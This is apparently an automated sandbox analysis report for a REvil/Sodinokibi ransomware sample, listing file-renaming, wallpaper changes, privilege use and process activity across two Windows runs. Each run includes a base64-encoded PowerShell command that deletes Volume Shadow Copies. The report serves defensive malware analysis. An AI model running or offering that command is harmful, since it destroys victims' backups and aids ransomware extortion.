Analysis Overview
SHA256
0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19
Threat Level: Known bad
The file 0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19 was found to be: Known bad.
Malicious Activity Summary
Sodin,Sodinokibi,REvil
Sodinokibi family
Sodinokibi/Revil sample
Modifies extensions of user files
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-30 08:04
Signatures
Sodinokibi family
Sodinokibi/Revil sample
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-30 08:04
Reported
2022-01-30 13:32
Platform
win7-en-20211208
Max time kernel
117s
Max time network
131s
Command Line
Signatures
Sodin,Sodinokibi,REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\SuspendSkip.tif => \??\c:\users\admin\pictures\SuspendSkip.tif.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockSubmit.png => \??\c:\users\admin\pictures\UnlockSubmit.png.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\SubmitLimit.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideConvert.tif => \??\c:\users\admin\pictures\HideConvert.tif.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallRequest.png => \??\c:\users\admin\pictures\InstallRequest.png.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MountDisable.crw => \??\c:\users\admin\pictures\MountDisable.crw.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairTest.crw => \??\c:\users\admin\pictures\RepairTest.crw.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitLimit.tiff => \??\c:\users\admin\pictures\SubmitLimit.tiff.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6q2.bmp" | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe
"C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/1744-54-0x0000000075761000-0x0000000075763000-memory.dmp
memory/1916-55-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp
memory/1916-57-0x0000000002950000-0x0000000002952000-memory.dmp
memory/1916-58-0x0000000002952000-0x0000000002954000-memory.dmp
memory/1916-59-0x0000000002954000-0x0000000002957000-memory.dmp
memory/1916-56-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmp
memory/1916-60-0x000000001B760000-0x000000001BA5F000-memory.dmp
memory/1916-61-0x000000000295B000-0x000000000297A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-30 08:04
Reported
2022-01-30 13:33
Platform
win10-en-20211208
Max time kernel
102s
Max time network
139s
Command Line
Signatures
Sodin,Sodinokibi,REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ResetOut.tiff => \??\c:\users\admin\pictures\ResetOut.tiff.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ShowOpen.raw => \??\c:\users\admin\pictures\ShowOpen.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WriteTest.raw => \??\c:\users\admin\pictures\WriteTest.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\ConvertFromImport.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\ResetOut.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromImport.tiff => \??\c:\users\admin\pictures\ConvertFromImport.tiff.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitSelect.raw => \??\c:\users\admin\pictures\ExitSelect.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairRequest.crw => \??\c:\users\admin\pictures\RepairRequest.crw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xsa3kum7.bmp" | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 964 wrote to memory of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe
"C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/2500-123-0x000001CBEBAC0000-0x000001CBEBAE2000-memory.dmp
memory/2500-124-0x000001CBEB8A3000-0x000001CBEB8A5000-memory.dmp
memory/2500-122-0x000001CBEB8A0000-0x000001CBEB8A2000-memory.dmp
memory/2500-128-0x000001CBEC5B0000-0x000001CBEC626000-memory.dmp